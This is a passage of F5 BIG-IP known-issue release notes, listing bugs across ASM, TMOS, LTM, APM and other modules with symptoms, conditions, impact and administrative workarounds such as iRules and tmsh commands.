1710233-2 : No option to disable violation for double-escaped NULL in query string

Links to More Info: BT1710233

Component: Application Security Manager

Symptoms:
Requests containing double-escaped NULL characters (e.g., %2500) trigger a violation, even when single-escaped NULL (%00) detection is desired.

Conditions:
Occurs when ASM is configured to detect NULL characters in query strings. There is currently no granular control to differentiate between %00 and %2500.

Impact:
May result in false positives for legitimate traffic using double-escaped characters, with no available configuration to suppress this specific violation.

Workaround:
None


1708957-2 : Excessive debug logs can cause key management daemon failure

Links to More Info: BT1708957

Component: TMOS

Symptoms:
During the upgrade, when there are a large number of folders and the configuration is loading, due to logging for each folder creation, the key management daemon (KeyMgmtDaemon) fails and can result into upgrade failure.

Conditions:
- A large number of folders present in the device before upgrade.
- Logging level is set to "Debug"
- Initiate the upgrade.

Impact:
Device upgrade fails.

Workaround:
Change the log level to a value higher than "Debug" before initiating the upgrade.


1690005-2 : Masquerade Mac is not removed when F5OS is rebooted

Links to More Info: BT1690005

Component: F5OS Messaging Agent

Symptoms:
Masquerade Mac is not removed when F5OS is rebooted.
It can be observed using the 'show fdb' command in confd

Conditions:
- A HA pair of tenants is used
- A traffic group uses a masquerade mac
- The Active tenant is rebooted

Impact:
Active and Standby act as if they are the owners of Floating MAC and IP.

Workaround:
The masquerade mac's fdb can be manually deleted using the F5OS CLI.
From the standby F5OS system CLI:
config
no fdb mac-table entries entry <mac masquerade address>
commit


1688545-2 : PVA-processed traffic is not included in the route-domain stats via SNMP

Links to More Info: BT1688545

Component: TMOS

Symptoms:
PVA traffic sent to the VIP is not reflected in the route-domain statistics within SNMP.

Conditions:
Viewing ltmRouteDomainStat* route domain statistics in F5-BIGIP-LOCAL-MIB

Impact:
Discrepancy between the throughput statistics and traffic statistics on per-VLAN basis

Workaround:
None


1682101-2 : Restjavad CPU goes close to 100% during telemetry pollers collect stats

Links to More Info: BT1682101

Component: TMOS

Symptoms:
Restjavad CPU utilization approaches 100% when telemetry endpoints are accessed, such as
/mgmt/shared/telemetry/pullconsumer/metrics

Conditions:
Telemetry operations endpoints are used.

Issue observed on releases with an existing fix, ID 1040573 at https://cdn.f5.com/product/bugtracker/ID1040573.html, where some changes happened on icrd operations.

Impact:
During telemetry operations ,100% restjavad usage occurs.

Workaround:
None


1678105-3 : F5OS tenant, TMM crashing after loading a UCS

Links to More Info: BT1678105

Component: TMOS

Symptoms:
If a UCS is loaded on a F5OS tenant and the name of the tenant from where the UCS was saved does not match the tenant name where it is restored.

Conditions:
- UCS restored on tenant with a different tenant name than were the UCS was created.

Impact:
The tenant will not become operational because TMM fails to start.

Workaround:
Refer to following steps for workaround:

1. Remove the file "tmm_velocity_init.tcl" in /config/.
2. Perform bigstart restart platform_agent.
3. Ensure a new "tmm_velocity_init.tcl" is created and TMM stops failing.


1677429-4 : BFD: TMM might not agree on session ownership.

Links to More Info: BT1677429

Component: TMOS

Symptoms:
Bidirectional forwarding detection (BFD): TMM might not agree on session ownership.

Conditions:
- Multi-bladed chassis.
- A blade is added or removed in a cluster.

Impact:
BFD session ownership moves to a new TMM.

Workaround:
None


1677409-2 : Show auth login-failures does not show failures when remote auth falls back to local auth

Links to More Info: BT1677409

Component: TMOS

Symptoms:
If the remote auth server fails and is configured to fallback to local auth, failures of local auth accounts are not tracked when we look at show auth login-failures

Conditions:
Issue occurs when remote auth server fails and is configured to fallback to local auth.

Impact:
Show auth login-failures is not showing the failure users which makes it more difficult to track login failures.

Workaround:
None


1670625-3 : Incorrect set of TCAM rules

Links to More Info: BT1670625

Component: TMOS

Symptoms:
Incorrect set of TCAM rules.

Conditions:
Multiple hardware acceleration features are activated simultaneously.

Impact:
Hardware offload does not function properly, only software protection is available.

Workaround:
None


1670465-4 : TMMs might not agree on session ownership when multiple cluster geometry changes occur.

Links to More Info: BT1670465

Component: TMOS

Symptoms:
TMMs might not agree on session ownership when multiple cluster geometry changes occur in a quick succession.

Conditions:
Cluster geometry changes occur in a quick succession, for example two blades come up one after another during a software upgrade.

Impact:
Session might be dropped few minutes/seconds after cluster geometry change happens

Workaround:
None


1670225-4 : 'Last Error' field remains empty after initial monitor Down status post-reboot

Links to More Info: BT1670225

Component: Local Traffic Manager

Symptoms:
After rebooting the BIG-IP system, the 'Last Error' field in the /var/log/ltm log for a TCP monitor shows as empty (null) following the first occurrence of the monitor's down status.

mcpd[6893]: 01070638:5: Pool /Common/http_pool member /Common/192.168.10.71:80 monitor status down. [ /Common/my_tcp_monitor: down; last error: ] [ was up for 0hr:0min:41sec ]

And If pool member goes back to 'up' and then 'down' again, 'last error:' string is not empty, but the 'last error" string is not the most recent failure reason following.

mcpd[8820]: 01070638:5: Pool /Common/http_pool member /Common/10.2.116.207:80 monitor status down. [ /Common/myhttpmon: down; last error: /Common/myhttpmon: Response Code: 200 (OK) @2024/12/09 00:14:23. ] [ was up for 0hr:0min:32sec ]

Conditions:
The issue occurs when the monitor status of system is up and rebooted and during the first occurrence of a monitor's down status following the reboot, and pool member goes back to 'up' and then 'down' again.

Impact:
Users may not be able to determine the cause of monitor failures immediately after a system reboot, and pool member goes back to 'up' and then 'down' again. as the 'Last Error' field does not provide the necessary diagnostic information

Workaround:
None


1670041-1 : [SWG] VCMP all secondary slots restart when URL categories are modified/deleted

Component: Access Policy Manager

Symptoms:
VCMP Blades restart after modifying a SWG category.

After the deletion occurs, log entries can be seen in /var/log/ltm:

err mcpd[6095]: 01070734:3: Configuration error: Configuration from primary failed validation: 010717ac:4: Configuration Warning: The is-recategory flag in url-category (/Common/categoryname) is reset to false, because the last url has been removed.... failed validation with error 17242028.

notice clusterd[7358]: 013a0006:5: Failed to send cluster packet; disconnecting

info sod[4418]: 010c0009:6: Lost connection to mcpd - reestablishing.

notice mcpd[4424]: 0107092a:5: Secondary slot 3 disconnected

Conditions:
-- VCMP secondary blades
-- URL categories are modified or deleted

Impact:
Unexpected failover when modifying SWG Categories

Workaround:
None


1644497-4 : TMM retains old Certificate Revocation List (CRL) data in memory until the existing connections are closed

Links to More Info: BT1644497

Component: TMOS

Symptoms:
In TMM memory, the old CRL data is available until the existing connections are closed. This may exhaust TMM memory.

Conditions:
- Connections last for a long time.
- Frequent updates on the CRL.

Impact:
TMM memory exhausts.

Workaround:
- Dynamic CRL or CRLDP on the Client-SSL profile can be configured to dynamically verify the SSL certificate revocation status.

or

- Online Certificate Status Protocol (OCSP) can be enabled on the Client-SSL profile to validate SSL certificate revocation status.


1633133-2 : ASM TS cookies include trailing semicolon

Links to More Info: BT1633133

Component: Application Security Manager

Symptoms:
ASM inserts a trailing semicolon in the TS cookie, disrupting applications that do not expect it.

For example:

Set-Cookie: TS01e598a2=018d578595eac155bac90a9dac4562f0c357fa23f53c83b38f057138f89dbda17976c061d9a60c0dca82491a94744e566b62469281; Path=/;
Set-Cookie: TS01e598a2028=0101747a8abb3052a8487a52e0e6de781695602a00e66c53fff71760ff70be79fd26ba42ca5db34438591fefc96318d24a3b065d6e; Path=/;

Conditions:
This behavior is observed in BIG-IP version 17.0.0 and higher releases. In releases prior to BIG-IP 17.0.0, this trailing semicolon is not added.

Impact:
The service is disrupted for applications that are not equipped to handle the trailing semicolon.

Workaround:
An iRule can be used to workaround this issue:

Following is an example:

when HTTP_RESPONSE_RELEASE {
    # Check if the response has a Set-Cookie header
    if {[HTTP::header exists "Set-Cookie"]} {
    
        set header_list [HTTP::header values "Set-Cookie"]
        
        HTTP::header remove "Set-Cookie"
        
        foreach cookie_header $header_list {

            # Use regex to remove the trailing semicolon
            set modified_cookie_header [regsub -all {;[\s]*$} $cookie_header ""]
        
            # Replace the Set-Cookie header with the modified one
            HTTP::header insert "Set-Cookie" $modified_cookie_header
            unset modified_cookie_header
        }
    }
}


1629857-2 : Unexpected junk characters in ASM websocket traffic.

Links to More Info: BT1629857

Component: Application Security Manager

Symptoms:
The websocket traffic request field contains junk characters that require attention.

Conditions:
- Websocket logging with request field
- The websocket connection uses compression
- The compression uses context takeover, which increases subsequent frames' compression rate ( same data size but smaller frame length, thanks to context takeover ).

Impact:
The request field in logging is wrong

Workaround:
Disable websocket compression.

For instance, disable WebSocket compression by removing the "Sec-WebSocket-Extensions" header from the upgrade request HTTP request. This can be achieved through available options, Websocket profile, ASM configuration, or an iRule.


1628129-2 : SSL Orchestrator traffic summary log does not display url-category for HTTP request if a SWG as a service blocks the connection

Links to More Info: BT1628129

Component: SSL Orchestrator

Symptoms:
The traffic summary for an SSL Orchestrator explicit proxy topology in the apm logs when log levels are set to Information does not display the url-category for the connection. Instead just `url-category: NA` is displayed.

Conditions:
An explicit proxy topology is deployed that uses a Secure Web Gateway (SWG) as a service to process traffic and the SWG rejects an http connection coming through the proxy.

Impact:
The traffic summary log message is incomplete not displaying the url-category.

Workaround:
There is no workaround for the traffic summary log message. Instead the category would need to be logged in a different way such as
1. Use a logging macro in the Secure Web Gateway's Per-Request-Policy


1624557-3 : HTTP/2 with RAM cache enabled could cause BIG-IP to return HTTP 304 with content

Links to More Info: BT1624557

Component: Local Traffic Manager

Symptoms:
When the server replies to BIG-IP with HTTP 304 (not modified) and the BIG-IP system returns the contents of the RAM cache, it will not change the HTTP code 304 returned by the server when sending the cached content back to the client. The client will reject the HTTP 304 with content since it is expecting 200 OK with content.

Conditions:
-- Content in RAM cache has expired
-- The BIG-IP system requests an update from the origin server
-- The origin server returns 304 Not Modified.

Impact:
The BIG-IP system sends the response to the client as a 304 along with the content, causing the client to reject the content.

Workaround:
Disable RAM cache or alternatively have the server never return HTTP 304 but rather the content with 200 OK, even if unchanged.


1623921-3 : IPencap monitor probes from bigd are prone to connection re-use.

Links to More Info: BT1623921

Component: Local Traffic Manager

Symptoms:
When using a DNS monitor with IP encapsulation, TMM handles probe encapsulation. Bigd reuses source ports after closing sockets quickly, but TMM applies a 30-second timeout, leading to connection re-use. This can result in probes being incorrectly encapsulated to the wrong pool member, causing inaccurate health monitoring

Conditions:
1. DNS monitor configured with 'transparent' destination and IP encapsulation enabled.
2. Large number of pool members (e.g., 60).

Impact:
Probes may be encapsulated to the wrong destination, leading to inaccurate health monitoring of pool members.

Workaround:
None


1615081-4 : Remove SHA and AES Constraint Checks in SNMPv3

Links to More Info: BT1615081

Component: TMOS

Symptoms:
SNMPv3 user cannot be created with a combination of SHA-2 and AES.
The following errors are observed:

> 'SHA-256 + AES' returns "The AES privacy protocol keys cannot be shorter than 192 with SHA-2 auth protocol."
> 'SHA-512 + AES' returns "The AES privacy protocol keys cannot be shorter than 192 with SHA-2 auth protocol."
> 'SHA + AES-256' returns "SHA-2 auth protocol is required with longer AES keys."
> 'SHA + AES-192' returns "SHA-2 auth protocol is required with longer AES keys."

Conditions:
- Creating SNMPv3 user with combination of SHA-2 and AES.

Impact:
Unable to create SNMPv3 user with lower keys.

Workaround:
None


1612201-3 : Malformed certificates found in local /config/httpd/conf/ssl.crt/server.crt

Links to More Info: BT1612201

Component: Global Traffic Manager (DNS)

Symptoms:
The gtm_add command fails with:

"ERROR: found "END CERT..." without BEGIN at line: 0.
ERROR: Malformed certificates found in local /config/httpd/conf/ssl.crt/server.crt."

Conditions:
A device certificate in PEM format contains a newline as CRLF:

-- Create device certificate where "-----BEGIN CERTIFICATE-----" is terminated with CRLF ('\r\n' 0x0D 0x0A) instead of LF ('\n' 0x0A)
-- Perform the gtm_add.

Impact:
The gtm_add command fails with a malformed certificate error.

Workaround:
To mitigate use openssl x509 to convert CRLF to LF:

# cp /config/httpd/conf/ssl.crt/server.crt /config/httpd/conf/ssl.crt/server.crt-back
# openssl x509 -in /config/httpd/conf/ssl.crt/server.crt-back > /config/httpd/conf/ssl.crt/server.crt


1607277-4 : Permission Denied error when trying to download the Windows Client Package from Connectivity Profile on Standby

Links to More Info: BT1607277

Component: Access Policy Manager

Symptoms:
An exception occurs when trying to download the Windows Edgeclient package

clientdownload.DownloadHandler:error -
java.io.FileNotFoundException: /var/tmp/BIGIPEdgeClient.exe (Permission denied)

Conditions:
-- On standby device
-- Windows Edgeclient package download

Impact:
Unable to download the Windows EdgeClient Package.

Workaround:
None


1602641-5 : Configuring verified-accept and SSL mirroring on the same virtual results in stalled connections.

Links to More Info: BT1602641

Component: Local Traffic Manager

Symptoms:
If a virtual server has SSL mirroring and with verified-accept enabled, the set handshake timeout value will be delayed during the SSL handshake client connections. The standby unit will not copy the connection to the virtual server.

Conditions:
- Verified accept enabled
- SSL mirroring enables
- An HA pair

Impact:
- SSL connections delayed inside the SSL handshake
- SSL connections are not mirrored to the peer unit.

Workaround:
Disable mirroring or disable verified-accept.


1602629-4 : Tmm_mcpmsg_print can trigger SOD

Links to More Info: BT1602629

Component: TMOS

Symptoms:
TMM is killed by SOD.

Conditions:
Conditions are unknown, it was encountered when ID 1047789 was encountered, see https://cdn.f5.com/product/bugtracker/ID1047789.html

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None


1602345 : Resource records are not always created when wideips are created in a bundle

Links to More Info: BT1602345

Component: Global Traffic Manager (DNS)

Symptoms:
Resource records are not created for some of the created WideIPs.

Conditions:
WideIPs are created in a bundle.

Impact:
Resource records are missing.

Workaround:
Wait for more than a minute before creating another wideip;
Or
When resource records are found missing, delete the related wideips and also delete related db zone file for that wideip, then recreate the wideip.


1602209-4 : The bigipTrafficMgmt.conf file is not copied from UCS to /config/snmp

Links to More Info: BT1602209

Component: TMOS

Symptoms:
After restoring a UCS file, or after an upgrade, the file /config/snmp/bigipTrafficMgmt.conf is not updated.

Conditions:
The /config/snmp/bigipTrafficMgmt.conf has been modified.

Impact:
If the file was modified, the modifications are lost on upgrade or UCS install. The file will need to be modified again and snmpd restarted, and restarted on all blades/slots.

Workaround:
Edit the bigipTrafficMgmt.conf by hand after the upgrade.

After the above config file has been modified and saved, the "snmpd" daemon must be restarted, using one of two command variants:

  (on a BIG-IP appliance or VE system)

  # bigstart restart snmpd

  (on a a multi-slot VIPRION or vCMP guest)

  # clsh bigstart restart snmpd


1601517-1 : BD daemon crash on specific scenario

Links to More Info: BT1601517

Component: Application Security Manager

Symptoms:
With the ASM module licensed, provisioned and configured, the bd daemon may crash while processing incoming traffic.

Conditions:
Although a specific trigger has not been identified, this issue may occur when processing very large (several megabytes) JSON payloads.

Impact:
Traffic disrupted while bd restarts.

Workaround:
None


1600229-2 : Sometimes, admin is unable to apply policies until failover

Links to More Info: BT1600229

Component: Access Policy Manager

Symptoms:
Applying an access policy appears to not work and appears as "yellow" even after clicking it multiple times.

Conditions:
OAuth client agent has "using-dynamic-server enabled" and configured to some session variable that can be populated from an iRule.

Impact:
-- apmd memory increases
-- apmd will be busy applying the huge configuration.
-- The access policy is not applied and always appears yellow in spite of clicking multiple times.

Workaround:
None


1599841-1 : Partition access is not synced to Standby device after adding a remote user locally.

Links to More Info: BT1599841

Component: TMOS

Symptoms:
The local user created for the remote user does not have the same partition access for Standby device as it does for the Active device in the HA pair.

Conditions:
1) Log into the Active device as a remote user
2) Create a local user for this remote user (same name for the user)
3) Sync to the BIG-IP HA peer.

Impact:
The local user created has access only to the Active device and cannot login to the Standby one.

Workaround:
None


1598405-5 : Intermittent TCP RST error 'HTTP internal error (bad state transition)' occurs for larger files when the Explicit Proxy virtual server uses HTTP_REQUEST_SEND iRule event

Links to More Info: BT1598405

Component: Local Traffic Manager

Symptoms:
BIG-IP sends a TCP RST with the error message ‘bad state transition’ when the HTTP_REQUEST_SEND iRule event is triggered after the completion of the TLS handshake and acknowledgement by BIG-IP from the server.

Conditions:
- BIG-IP1 is a proxy for clients
- BIG-IP2 is provisioned with LTM and APM, connects to the server
- BIG-IP2 has ACCESS::session iRule command in HTTP_REQUEST_SEND event

Impact:
Client-side traffic may get disrupted.

Workaround:
None


1598381-1 : Unable to set the key-usage setting while renewing the CSR

Links to More Info: BT1598381

Component: Local Traffic Manager

Symptoms:
While renewing the CSR, key-usage value is set to empty.

Conditions:
While renewing the CSR with key-usage.

Impact:
Unable to configure the key-usage when renewing the CSR.

Workaround:
As a workaround, delete the complete certificate from GUI and create it using the below commands on CLI

> tmsh create sys crypto key test100.com key-size 2048 key-type rsa-private
> tmsh create sys crypto csr test100.com common-name \"test100.com\" key test100.com key-usage digitalSignature

Note: Here 'test100.com' is the certificate name.


1596637-2 : TLS1.3 with c3d and ocsp handshake failure

Links to More Info: BT1596637

Component: Local Traffic Manager

Symptoms:
SSL handshakes fail, and TLS clients send 'Bad Record MAC' errors.

Conditions:
-- TLS1.3 connection configured with c3d and ocsp.

Impact:
-- A handshake failure occurs.

Workaround:
Disable ocsp or use TLS1.2.


1596313-2 : Deleting and re-adding a LAG on F5OS causes a validation failure in mcpd, therefore the trunk on the tenant has no interfaces

Links to More Info: BT1596313

Component: TMOS

Symptoms:
When creating an HA group with a trunk in an LTM tenant, after the first reboot an error is thrown.

“Invalid attempt to register an n-stage validator, the stage must be greater than the current stage, and within the range 1 to 101 inclusive, current stage : 7 registered: 5 Unexpected”

Conditions:
-- BIG-IP tenant running on F5OS
-- High availability system
-- HA group with a trunk
-- The tenant is rebooted for the first time

Impact:
No impact on tmm VLAN traffic

Workaround:
Run the 'tmsh create sys ha-group' command again.


1590517-1 : High CPU utilization when enabling IPS + HTTP/2 Profile

Links to More Info: BT1590517

Component: Protocol Inspection

Symptoms:
When running HTTP/2 requests with all IPS signatures and compliance checks enabled, 100% TMM CPU utilization peaks occur.

Conditions:
-- Virtual server with an IPS and HTTP2 profile
-- HTTP2 traffic

Impact:
HTTP/2 traffic slowdown occurs, which impacts performance.

Workaround:
To help optimize CPU utilization, enable only the necessary IPS signatures and compliance checks based on specific requirements, rather than activating all available options. While this targeted approach reduces the system’s processing load and maintains essential protections, it may not completely eliminate CPU usage spikes under high traffic or intensive processing demands.


1589421-1 : LTM Monitor not shown in Pool Member "Health Monitors" if Transparent attribute changes

Links to More Info: BT1589421

Component: TMOS

Symptoms:
If an LTM monitor is created with an alias address configured and assigned to a pool or pool member(s), then the monitor's "transparent" attribute is changed (either from enabled to disabled, or from disabled to enabled), the monitor no longer appears in the Local Traffic GUI in the "Health Monitors" list for an affected pool member.

Conditions:
This occurs when all of the following conditions are true:
-- An LTM health monitor is configured with an Alias Address and/or Port (Destination field in TMSH)
-- The monitor is assigned to an LTM pool and/or pool member(s)
-- The monitor's Alias Address and/or Port are different from the address of the assigned pool member
-- After the monitor is assigned to the LTM pool and/or pool member(s), its "transparent" attribute is changed (either from enabled to disabled, or from disabled to enabled)
-- The list of Health Monitors assigned to a given pool member is viewed in the BIG-IP LTM GUI
(Local Traffic --> Pools : Pool List --> select pool --> Members --> select member)

Impact:
The assignment of the monitor to the pool member is not immediately visible in the BIG-IP LTM GUI in the "Health Monitors" list for the affected pool member(s).

When viewing the properties of the pool member in the Local Traffic GUI, if the "Advanced" Configuration view is selected, the Health Monitors assigned to the pool member can be viewed. If the "Inherit from Pool" option is configured, the Health Monitors assigned to the pool can be viewed under the Properties tab for the pool.

Workaround:
When viewing the properties of the pool member in the BIG-IP LTM GUI, if the "Advanced" Configuration view is selected, the Health Monitors assigned to the pool member can be viewed. If the "Inherit from Pool" option is configured, the Health Monitors assigned to the pool can be viewed under the Properties tab for the pool.


1589269-3 : The maximum value of sys db provision.extramb was reduced from 8192 to 4096 MB

Links to More Info: BT1589269

Component: SSL Orchestrator

Symptoms:
From version 16.1.0 the maximum value of sys db provision.extramb is 4096 MB, reduced from 8192 MB. It will be automatically set to 4096 during the upgrade if it has a higher setting.

Conditions:
Any BIG-IP device running software version 16.1.0 or higher.

Impact:
It is extremely rare to need values of provision.extramb above 4096 MB.

No impact on upgrade if value of sys db provision.extramb is 4096 or less. After the upgrade, it is not possible to increase the value above 4096.

If greater than 4096 the value will be reduced to 4096 when upgrading to version 16.1.0 or higher. This may leave device with insufficient 4KB page memory (also known as host memory) which may lead to issues due to memory pressure such as oom killer killing processes, poor scheduling of processes which may cause core dumps, and sluggish management access.

Workaround:
None


1586745-2 : LACP trunk status became DOWN due to bcm56xxd failure

Links to More Info: BT1586745

Component: TMOS

Symptoms:
Lacp, lldp reports trunk(s) down and you may observe the below logs.

err lldpd[7489]: 01570004:3: HAL send PDU failed
err lldpd[7489]: 01290003:3: HalmsgTerminalImpl_::sendMessage() Unable to send to any BCM56XXD address
err lldpd[7489]: 01570004:3: HAL send PDU request failed
info bcm56xxd[10383]: 012c0016:6: TableDmaTimeOut: ING_SERVICE_COUNTER_TABLE_X.ipipe0 interrupt timeout
err lacpd[10571]: 01290003:3: HalmsgTerminalImpl_::sendMessage() Unable to send to any BCM56XXD address
err lacpd[10571]: 01160005:3: HalMsgHandler.cpp:125 - HAL send PDU request failed
info bcm56xxd[10383]: 012c0016:6: TableDmaTimeOut:_soc_xgs3_mem_dma, Abort Failed
info bcm56xxd[10383]: 012c0016:6: TableDmaTimeOut: FP_COUNTER_TABLE_X.ipipe0 interrupt timeout
info bcm56xxd[10383]: 012c0016:6: TableDmaTimeOut:_soc_xgs3_mem_dma, Abort Failed
info bcm56xxd[10383]: 012c0016:6: TableDmaTimeOut: EFP_COUNTER_TABLE_X.epipe0 interrupt timeout
info bcm56xxd[10383]: 012c0016:6: TableDmaTimeOut:_soc_xgs3_mem_dma, Abort Failed

Conditions:
Not known at this time.

Impact:
An outage was observed

Workaround:
Restart bcm56xxd, lldpd, lacpd process.


1586405-3 : "/f5-h-$$/" repeatedly appened to URL's path every refresh of the page

Links to More Info: BT1586405

Component: Access Policy Manager

Symptoms:
Observe multiple "/f5-h-$$/" in URLs when accessing via Protected Access.

Conditions:
"<base href="xxxxx">" tag in the home page.

Impact:
URLs become lengthy upon every refresh and may lead to webapp misfunction.

Workaround:
Customized iRule

======================
when REWRITE_REQUEST_DONE {

    if { [HTTP::path] ends_with "path_to_file1" } {
        REWRITE::post_process 1
        set rewrite_new 1
        
    }
    if { [HTTP::path] ends_with "path_to_file2" } {
        REWRITE::post_process 1
        set rewrite_new1 1
        
    }
    
}

when REWRITE_RESPONSE_DONE {

    if {[info exists rewrite_new]} {
        unset rewrite_new
    
        set rewrite_str {<base href=""f5-h-$$path_in_file1"">}
        set rewrite_str_len [string length $rewrite_str]
        set strt [string first $rewrite_str [REWRITE::payload]]
        
        if {$strt > 0} {
            REWRITE::payload replace $strt $rewrite_str_len {<base href="/f5-w-6578616d706c652e636f6d//path_in_file1">}
        }
    }
    
    if {[info exists rewrite_new1]} {
        unset rewrite_new1
    
        set rewrite_str {<base href="f5-h-$$/path_in_file2">}
        set rewrite_str_len [string length $rewrite_str]
        set strt [string first $rewrite_str [REWRITE::payload]]
        
        if {$strt > 0} {
            REWRITE::payload replace $strt $rewrite_str_len {<base href="/f5-w-6578616d706c652e636f6d//path_in_file2">}
        }
    }
}
======================


1585153-1 : SSL handshake failures with error message Profile <name> cannot load key/cert/chain

Links to More Info: BT1585153

Component: Local Traffic Manager

Symptoms:
If the BIG-IP configuration has CA bundle manager with auto-sync enabled, it can lead to error
Profile /Common/CAbundle - /config/filestore/files_d/Common_d/certificate_d/:Common:cert2_46889_1 reading: Unknown error.

Conditions:
-- The CA bundle is being modified/updated.
-- An automatic config sync occurs

Impact:
SSL connection are failing for the given virtual server associated with the ssl profile.

Workaround:
If possible, disable auto-sync to avoid the issue.
Otherwise, when the problem happens:
-- Detach the client/server ssl profile from the virtual server, which has association with this file
-- Attach the client/server ssl profile to virtual server again after the file is available

Another workaround is:
Try to open the virtual server in the GUI and update it again with/without any minor change after file is available


1581685-4 : iRule 'members' command counts FQDN pool members.

Links to More Info: BT1581685

Component: Local Traffic Manager

Symptoms:
iRule 'members' command counts and lists FQDN pool members.

Conditions:
- create a pool with at least one FQDN member.
- use the members function in an iRule.

Impact:
iRule with members command will not give the desired result.

Workaround:
When FQDN pool members are present, using the 'members' command in the iRule will not yield the desired result.


1580369-4 : MCPD thrown exception when syncing from active device to standby device.

Links to More Info: BT1580369

Component: TMOS

Symptoms:
Config sync fails on the secondary blade and MCPD restarts.

In /var/log/ltm:

err mcpd[7906]: 0107134b:3: (rsync: link_stat "/config/filestore/.snapshots_d/custom_urldb_d/:Common:custom_feedlist_348871_3751" (in csync) failed: No such file or directory (2) ) errno(0) errstr().

err mcpd[7906]: 0107134b:3: (rsync error: some files/attrs were not transferred (see previous errors) (code 23) at main.c(1518) [Receiver=3.0.9] ) errno(0) errstr().

err mcpd[7906]: 0107134b:3: (syncer /usr/bin/rsync failed! (5888) () Couldn't rsync files for mcpd. ) errno(0) errstr().

err mcpd[7906]: 0107134b:3: (rsync process failed.) errno(255) errstr().

err mcpd[7906]: 01070712:3: Caught configuration exception (0), Failed to sync files..

Conditions:
- A BIG-IP system with multiple blades and multiple slots configured for high availability
- Active device has to download the custom_urldb file from a server
- A config sync occurs

Impact:
Config sync to the secondary blade fails and MCPD throws an exception and restarts on the secondary. The cluster primary blade has the correct custom_urldb file. This will impact incremental syncing to other peers in the device group.

Workaround:
None


1574521-2 : Intermittent high packet latency on R4000 and R2000 tenants

Links to More Info: BT1574521

Component: Performance

Symptoms:
When compared to previous platforms, BIG-IP tenants on R4000 and R2000 platforms may demonstrate higher jitter and packet latency / rtt. This affects pings, tcp, udp, and any other protocols processed by the software data plane (tmm).

This is because the r4000 and r2000 appliances have a slightly different hardware architecture than other appliances.

CPUs on this platform are not dedicated to the tenant and these platforms also run a different class of Intel processing, and do not utilize hyperthreading like the higher end platforms do.

See:
https://clouddocs.f5.com/training/community/rseries-training/html/rseries_performance_and_sizing.html#r4000-vcpu-sizing

Conditions:
BIG-IP tenants on R4000 and R2000 platforms

Impact:
Intermittent high latency and jitter.

Workaround:
None


1571817-4 : FQDN ephemeral pool member user-down state is not synced to the peer device

Links to More Info: BT1571817

Component: TMOS

Symptoms:
One or more FQDN ephemeral pool members on a device group member is showing an incorrect state for the pool member.

Conditions:
1. Create the FQDN pool with an FQDN template pool member and ensure that the state of any ephemeral pool member associated with the FQDN template pool member is 'up'.
2. On one member of the device group, modify the state of the FQDN template pool member to 'user-down'.
3. Synchronize the configuration to the device group.
4. Check the status of the pool on the same member of the HA pair and verify that the state of any ephemeral pool member associated with the FQDN template pool member is 'user-down'.
5. On the other member of the device group, the state of any ephemeral pool member associated with the FQDN template pool member is 'up'.

Impact:
The state of the ephemeral pool members on one member of the device group is incorrect.

Workaround:
None


1560449-2 : Rest_logintegrity does not suppress output to stderr

Links to More Info: BT1560449

Component: TMOS

Symptoms:
The find command in rest_logintegrity script fails and returns "No such file or directory" when no matching file is found if there are no newly rotated restnoded, restjavad log files whenever the rest_logintegrity script runs as part of the cron job.

Conditions:
When there are no files which matches the below patterns in the script:
"/var/log/restjavad.[1-9]*.log", "/var/log/restnoded/restnoded[1-9]*.log".

Impact:
Overload of emails with message similar to:

find: '/var/log/restnoded/restnoded[1-9]*.log': No such file or directory

Workaround:
Creating the files as below mitigates the error

touch /var/log/restnoded/restnoded1.log
touch /var/log/restjavad.1.log


1554961-2 : APM - Websso leeway time of 60 seconds

Links to More Info: BT1554961

Component: Access Policy Manager

Symptoms:
When JWT is cached, then the error "JWT Expired and cannot be used" is observed.

Conditions:
WebSSO is used with bearer option to generate JWT tokens.

Impact:
JWT fails in upper layer

Workaround:
None


1552913-2 : For advanced/premium deployment of BD profile, incomplete single js download may lead to blocking Protected URIs.

Links to More Info: BT1552913

Component: Bot Defense

Symptoms:
For Advanced/Premium deployment of a BD profile, if a request to protected URI occurs before the page is fully loaded, incomplete single js download may lead to blocking the Protected URIs.

Conditions:
1. Advanced/Premium deployment of BD profile
2. Protected URI is configured with block / redirect mitigation action.
3. The backend server sends a protected URI request through some script before the entry page is fully loaded.

Impact:
BD may block legitimate requests towards protected URIs.

Workaround:
None


1549397-4 : Pool member from statically-configured node deleted along with ephemeral pool member using same IP address

Links to More Info: BT1549397

Component: Local Traffic Manager

Symptoms:
If an LTM pool is created containing both FQDN and statically-configured pool members using different port numbers, and the FQDN name resolves to the same IP address as the statically-configured node, if the FQDN name no longer resolves to that IP address, the statically-configured pool member may be deleted along with the ephemeral pool member with the same IP address.

In this configuration, the pool in question may be found to contain:
-- a statically-configured (not ephemeral) pool member referencing the statically-configured node
-- an ephemeral pool member with the same node name and IP address as the statically-configured node

Both pool members have the same node name and IP address, since only one node can exist for a given IP address. This prevents a separate ephemeral node from being created with the same IP address as the statically-configured node, forcing both pool members to reference the same statically-configured node with the given IP address.

Conditions:
-- The LTM pool contains both FQDN pool members and pool members referencing statically-configured nodes.
-- The FQDN and statically-configured pool members use different port numbers.
-- The FQDN name resolves to one or more IP addresses that match the statically-configured node.
-- The DNS server subsequently no longer resolves the FQDN name to that IP address.

Impact:
Pool members may be deleted unexpectedly when DNS records/name resolution changes.

Workaround:
To work around this issue:
-- Use the same port number for both statically-configured pool members and FQDN pool members.
-- Add the statically-configured pool member(s) to the pool before adding any FQDN pool members which resolve to the same IP address(es).


1549341-2 : BD: block response body is truncated at 1024Bytes

Links to More Info: BT1549341

Component: Bot Defense

Symptoms:
- Client receives truncated block response body

Conditions:
- Bot Defense profile configured with protected endpoints having mitigation action as "Block". The size of the configured Block response body is greater than 1024Bytes.
- BD profile is attached to a virtual server
- Client request is classified as Malicious and block mitigation action is taken.

Impact:
The client will receive a truncated block response body


1510477-4 : RD rule containing zones does not match expected traffic on the Network firewall policy

Links to More Info: BT1510477

Component: Advanced Firewall Manager

Symptoms:
The ICMP packets are dropped based on the default match rule, instead of the RD rule match.

Conditions:
ICMP firewall policies created with Zone include Route Domain (RD) with two or more VLANs in the created Zone.

Impact:
The ICMP packets are dropped based on the default match rule instead of using the RD rule match to drop.

Workaround:
None


1505257-2 : False positive with "illegal base64 value" for Authorization header

Links to More Info: BT1505257

Component: Application Security Manager

Symptoms:
False positive "illegal base64 value" is detected

Conditions:
